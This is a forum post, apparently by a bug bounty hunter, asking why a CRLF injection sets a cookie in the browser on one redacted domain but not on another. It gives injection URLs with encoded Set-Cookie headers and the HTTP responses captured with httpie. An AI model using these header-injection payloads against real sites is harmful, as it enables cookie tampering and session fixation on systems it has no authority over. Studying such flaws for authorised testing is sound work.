Cookie is not being set after CRLF Injection in one domain but set in another domain. How can i bypass/set it?

Ok i am facing a very weird behaviour that sets and doesnt set cookie both. So, first i have found CRLF injection in 2 domains, redacted.de and redacted_another.com. When i go to redacted_another.com vulnerable url, the cookie gets set into firefox-esr. This works in browser. There first vulnerable domain i encountered had this url:

https://www.redacted_another.com/lp/%0ASet-Cookie:%20dipesh=yadav

I can view cookies using developers tool. This is default behaviour as i think. The next domain i encountered had this vulnerable urls but it didnt work in browser 🙁 :

http://www.redacted.de/forum/%0aSet-Cookie:%20dipesh=yadav
http://www.redacted.de/sso/registration/account/%3f%0d%0aSet-Cookie:%20dipesh=yadav

But when i visit this any urls from redacted.de it doest work in browser. Also, both redacted_another.com and redacted.de sets cookie in curl response. This is what it looks like for both redacted but the first one works in browser and second doesnt in browser.
Working Curl request:

root@kali-linux:~/redacted/# http https://www.redacted.com/lp/%0ASet-Cookie:%20dipesh=yadav

HTTP/2 301 
date: Thu, 13 Aug 2020 15:02:53 GMT
content-type: text/html
content-length: 185
location: https://www.redacted.com/lp/redirects/?olp=/lp/
set-cookie: dipesh=yadav
expires: Thu, 20 Aug 2020 15:02:53 GMT
cache-control: max-age=604800

HTTP/2 200 
date: Thu, 13 Aug 2020 15:02:53 GMT
content-type: text/html
content-length: 1452
vary: Accept-Encoding
last-modified: Tue, 04 Feb 2020 15:54:26 GMT
etag: "redacted"
expires: Thu, 20 Aug 2020 15:02:53 GMT
cache-control: max-age=604800
access-control-allow-origin: *
accept-ranges: bytes

NOT WORKING REQUEST:

root@kali-linux:~/redacted# http http://www.redacted.de/sso/registration/account/%0aSet-Cookie:%20bugbounty=bugbountyplz

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Thu, 13 Aug 2020 15:05:04 GMT
Content-Type: text/html
Content-Length: 162
Location: https://www.redacted.de/sso/registration/account/
Set-Cookie: bugbounty=bugbountyplz
Last-Modified: Thu, 13 Aug 2020 15:05:04 GMT
Cache-Control: private
Age: 0
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Connection: keep-alive

HTTP/2 200 
server: nginx
date: Thu, 13 Aug 2020 15:05:05 GMT
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
access-control-allow-credentials: true
access-control-allow-origin: https://www.redacted.de
last-modified: Thu, 13 Aug 2020 15:05:05 GMT
cache-control: no-cache, private
age: 0
strict-transport-security: max-age=15768000
x-frame-options: DENY
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
accept-ranges: bytes

Can anyone help me with this? Whats the problem that doesnt letme set cookie in redacted.de but i can set cookie in redacted_another.com.

Go to Source
Author: Dipesh Sunrait